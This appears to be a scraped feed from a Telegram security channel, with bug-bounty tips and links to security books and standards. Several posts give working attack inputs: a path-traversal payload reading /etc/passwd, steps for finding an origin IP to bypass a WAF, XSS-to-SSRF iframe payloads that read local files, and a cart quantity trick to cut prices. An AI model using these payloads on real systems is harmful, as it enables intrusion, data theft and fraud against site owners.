1- on visiting url http://domain.tld it were redirecting first to http://domain.tod/dir1/dir2 then to sso login
2- Fuzzed after first redirection
3- http://domain.tld/dir1/dir2/FUZZ
4- this payload leads to 200 ok & disclosed all local files
////////////////../../../../../../../../etc/passwd
5- tried other local files
/etc/hosts
/etc/shells
/proc/self/environ
/bin/sh
Please open Telegram to view this post
VIEW IN TELEGRAM
❤2👍1🎉1
Bug Bounty Tips: Discovering the Origin IP by scanning your target IP range
When you're hunting on a bug bounty target and WAF stands in your way, here's a powerful technique to uncover the Origin IP by scanning the target's IP range.
We'll be using a simple yet effective tool called hakoriginfinder by hakluke! Get it at https://github.com/hakluke/hakoriginfinder
Here's my methodology to find the Origin IP using this tool and technique:
Discover your target's ASN and check https://bgp.he.net/AS33848#_prefixes?
Make a note of the target's IP range.
Assuming you have a WAF-protected domain called example[.]com. Use this command with the IP range Identified in step 1 and pass your target host against the -h parameter:
prips 93.184.216.0/24 | hakoriginfinder -h example[.]com
If you receive a "MATCH" output, there's a strong likelihood that you've successfully identified the Origin IP. Now, you can send requests with the same Host header to bypass WAF or for whatever your mission requires. Happy hunting!
credit:- Jayesh
🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
When you're hunting on a bug bounty target and WAF stands in your way, here's a powerful technique to uncover the Origin IP by scanning the target's IP range.
We'll be using a simple yet effective tool called hakoriginfinder by hakluke! Get it at https://github.com/hakluke/hakoriginfinder
Here's my methodology to find the Origin IP using this tool and technique:
Discover your target's ASN and check https://bgp.he.net/AS33848#_prefixes?
Make a note of the target's IP range.
Assuming you have a WAF-protected domain called example[.]com. Use this command with the IP range Identified in step 1 and pass your target host against the -h parameter:
prips 93.184.216.0/24 | hakoriginfinder -h example[.]com
If you receive a "MATCH" output, there's a strong likelihood that you've successfully identified the Origin IP. Now, you can send requests with the same Host header to bypass WAF or for whatever your mission requires. Happy hunting!
credit:- Jayesh
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - hakluke/hakoriginfinder: Tool for discovering the origin host behind a reverse proxy. Useful for bypassing cloud WAFs!
Tool for discovering the origin host behind a reverse proxy. Useful for bypassing cloud WAFs! - hakluke/hakoriginfinder
❤1😱1🎉1🤩1
Use these tools to bypass 403 most time it give false postive always check for content length.Both tool bypass protocol based,header based,path based and more techniques.
https://github.com/Dheerajmadhukar/4-ZERO-3
https://github.com/yunemse48/403bypasser
🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
https://github.com/Dheerajmadhukar/4-ZERO-3
https://github.com/yunemse48/403bypasser
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - Dheerajmadhukar/4-ZERO-3: 403/401 Bypass Methods + Bash Automation + Your Support ;)
403/401 Bypass Methods + Bash Automation + Your Support ;) - Dheerajmadhukar/4-ZERO-3
❤2🔥2👍1
⭐️𝐗𝐒𝐒 𝐭𝐨 𝐒𝐒𝐑𝐅 (𝐌𝐞𝐭𝐡𝐨𝐝 𝟐)⭐️
* Note this only works if proper sanitization is not performed and the server processes the payload server-side *
Input the following code in the vulnerable field:
<iframe src="http://localhost/some/directory"></iframe>
You can also read local files:
<iframe src="file:///C:/Windows/win.ini" width="500" height="500">
This is especially critical if an application is running on an EC2 instance that does not have IMDSv2 required.
🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
* Note this only works if proper sanitization is not performed and the server processes the payload server-side *
Input the following code in the vulnerable field:
<iframe src="http://localhost/some/directory"></iframe>
You can also read local files:
<iframe src="file:///C:/Windows/win.ini" width="500" height="500">
This is especially critical if an application is running on an EC2 instance that does not have IMDSv2 required.
Please open Telegram to view this post
VIEW IN TELEGRAM
❤5👏1😢1
Price Manipulation Method
If the product price parameter cannot be changed, change the quantity of products.
items[1][quantity]=1 --> 234 €
items[1][quantity]=0.1 --> 23.4 €
🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
If the product price parameter cannot be changed, change the quantity of products.
items[1][quantity]=1 --> 234 €
items[1][quantity]=0.1 --> 23.4 €
Please open Telegram to view this post
VIEW IN TELEGRAM
❤2🔥2🤩2
This media is not supported in your browser
VIEW IN TELEGRAM
You can now passively enumerate all endpoints of a website with katana. (No need waybackurls)
Example:
echo nasa.gov | katana -passive -f qurl -pss waybackarchive,commoncrawl,alienvault | tee endpoints
You can then check the status of these endpoints or filter in order to find new vulnerabilities:
Example:
echo nasa.gov | katana -passive -f qurl -pss waybackarchive,commoncrawl,alienvault | httpx -mc 200 | grep -E '\.(js|php)$' | tee specificEndpoints
🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
Example:
echo nasa.gov | katana -passive -f qurl -pss waybackarchive,commoncrawl,alienvault | tee endpoints
You can then check the status of these endpoints or filter in order to find new vulnerabilities:
Example:
echo nasa.gov | katana -passive -f qurl -pss waybackarchive,commoncrawl,alienvault | httpx -mc 200 | grep -E '\.(js|php)$' | tee specificEndpoints
Please open Telegram to view this post
VIEW IN TELEGRAM
❤2🔥2👍1
دزدی داده از طریق ICMP
https://blog.bwlryq.net/posts/icmp_exfiltration
🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer/
https://blog.bwlryq.net/posts/icmp_exfiltration
Please open Telegram to view this post
VIEW IN TELEGRAM
bWlrYQ | Blog
[Network] ICMP Exfiltration (Wrapped Gift)
Technical blog detailing the ICMP protocol and ICMP exfiltration through the WriteUp of a CTF challenge
😱3❤2👍1🔥1
Strategic Cybersecurity Talent Framework.pdf
33.2 MB
پرورش استعداد ها در امنیت سایبری
راهکار استراتژیک
🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
راهکار استراتژیک
Please open Telegram to view this post
VIEW IN TELEGRAM
❤2👍1🎉1
Infographics
The DoD Cybersecurity Policy Chart,
October 2024.
https://csiac.org/resources/the-dod-cybersecurity-policy-chart
🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
The DoD Cybersecurity Policy Chart,
October 2024.
https://csiac.org/resources/the-dod-cybersecurity-policy-chart
Please open Telegram to view this post
VIEW IN TELEGRAM
❤2👍1🔥1
Infosec Standards
NIST SP 800-63B-4:
"Digital Identity Guidelines. Authentication and Authenticator Management", August 2024.
NIST SP 800-63-4:
"Digital Identity Guidelines"
https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-63-4.2pd.pdf
NIST SP 800-63A-4:
"Identity Proofing and Enrollment"
https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-63A-4.2pd.pdf
NIST SP 800-63C-4:
"Federation and Assertions"
https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-63C-4.2pd.pdf
National Institute of Standards and Technology (NIST)
——————————————————
#CyberSecurity #vCISO #NIST #AAA
🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
NIST SP 800-63B-4:
"Digital Identity Guidelines. Authentication and Authenticator Management", August 2024.
NIST SP 800-63-4:
"Digital Identity Guidelines"
https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-63-4.2pd.pdf
NIST SP 800-63A-4:
"Identity Proofing and Enrollment"
https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-63A-4.2pd.pdf
NIST SP 800-63C-4:
"Federation and Assertions"
https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-63C-4.2pd.pdf
National Institute of Standards and Technology (NIST)
——————————————————
#CyberSecurity #vCISO #NIST #AAA
Please open Telegram to view this post
VIEW IN TELEGRAM
❤2👍1🔥1
Hardening
Enhanced Visibility and Hardening Guidance for Communications Infrastructure 2024.:
Network Infrastructure Security Guide, ver.1.2
https://media.defense.gov/2022/Jun/15/2003018261/-1/-1/0/CTR_NSA_NETWORK_INFRASTRUCTURE_SECURITY_GUIDE_20220615.PDF
Cisco Guide to Securing NX-OS Devices
https://sec.cloudapps.cisco.com/security/center/resources/securing_nx_os.html
Cisco IOS XE Hardening Guide, 2024
https://www.cisco.com/c/en/us/support/docs/ios-nx-os-software/ios-xe-16/220270-use-cisco-ios-xe-hardening-guide.html
——————————————————
#CyberSecurity #vCISO #CISA #Hardening
#SecureBusinessContinuity
🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
Enhanced Visibility and Hardening Guidance for Communications Infrastructure 2024.:
Network Infrastructure Security Guide, ver.1.2
https://media.defense.gov/2022/Jun/15/2003018261/-1/-1/0/CTR_NSA_NETWORK_INFRASTRUCTURE_SECURITY_GUIDE_20220615.PDF
Cisco Guide to Securing NX-OS Devices
https://sec.cloudapps.cisco.com/security/center/resources/securing_nx_os.html
Cisco IOS XE Hardening Guide, 2024
https://www.cisco.com/c/en/us/support/docs/ios-nx-os-software/ios-xe-16/220270-use-cisco-ios-xe-hardening-guide.html
——————————————————
#CyberSecurity #vCISO #CISA #Hardening
#SecureBusinessContinuity
Please open Telegram to view this post
VIEW IN TELEGRAM
❤2👍1🔥1🤩1👨💻1
API_Sec_White_Hackers.pdf
35.4 MB
Tech book
API Security for White Hat Hackers: Uncover offensive defense strategies and get up to speed with secure API implementation 2024.
🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
API Security for White Hat Hackers: Uncover offensive defense strategies and get up to speed with secure API implementation 2024.
Please open Telegram to view this post
VIEW IN TELEGRAM
❤2👍1🔥1👏1😱1🤩1
macsec.pdf
17.7 MB
Research
Unveiling Mac Security:
A Comprehensive Exploration of Sandboxing and AppData TCC 2024.
https://github.com/guluisacat/MySlides/tree/main/BlackHatUSA2024_KCon2024
🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
Unveiling Mac Security:
A Comprehensive Exploration of Sandboxing and AppData TCC 2024.
https://github.com/guluisacat/MySlides/tree/main/BlackHatUSA2024_KCon2024
Please open Telegram to view this post
VIEW IN TELEGRAM
❤2🤩2👍1🔥1🎉1
Eth_psw_crack.epub
20.3 MB
Tech book
Ethical Password Cracking:
Decode passwords using John the Ripper, hashcat, and advanced methods for password breaking 2024.
🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
Ethical Password Cracking:
Decode passwords using John the Ripper, hashcat, and advanced methods for password breaking 2024.
Please open Telegram to view this post
VIEW IN TELEGRAM
❤2👍1🔥1😁1😱1🤩1
MD_MZ.pdf
70.4 MB
Techbook
Malware Development:
The result of self-research and investigation of malware development tricks, evasion techniques and persistence 2022.
🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
Malware Development:
The result of self-research and investigation of malware development tricks, evasion techniques and persistence 2022.
Please open Telegram to view this post
VIEW IN TELEGRAM
❤2🔥1🤩1
DB_Forensics.pdf
13.2 MB
DFIR
Techbook
A Practical Hands-on Approach to Database Forensics.
🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
Techbook
A Practical Hands-on Approach to Database Forensics.
Please open Telegram to view this post
VIEW IN TELEGRAM
❤2🔥1😱1
Cloud_Hacking.pdf
17.7 MB
Techbook
CloudSecurity
Cloud Hacking Playbook 2024.
🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
CloudSecurity
Cloud Hacking Playbook 2024.
Please open Telegram to view this post
VIEW IN TELEGRAM
👏3👍1🔥1😱1🕊1
eBPF_Sec_Model.pdf
1.5 MB
Whitepaper
ThreatResearch
eBPF Security Threat Model 2024.
eBPF Verifier Code Review (.pdf)
https://github.com/ebpffoundation/publications
🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
ThreatResearch
eBPF Security Threat Model 2024.
eBPF Verifier Code Review (.pdf)
https://github.com/ebpffoundation/publications
Please open Telegram to view this post
VIEW IN TELEGRAM
❤4👍1🔥1👏1😱1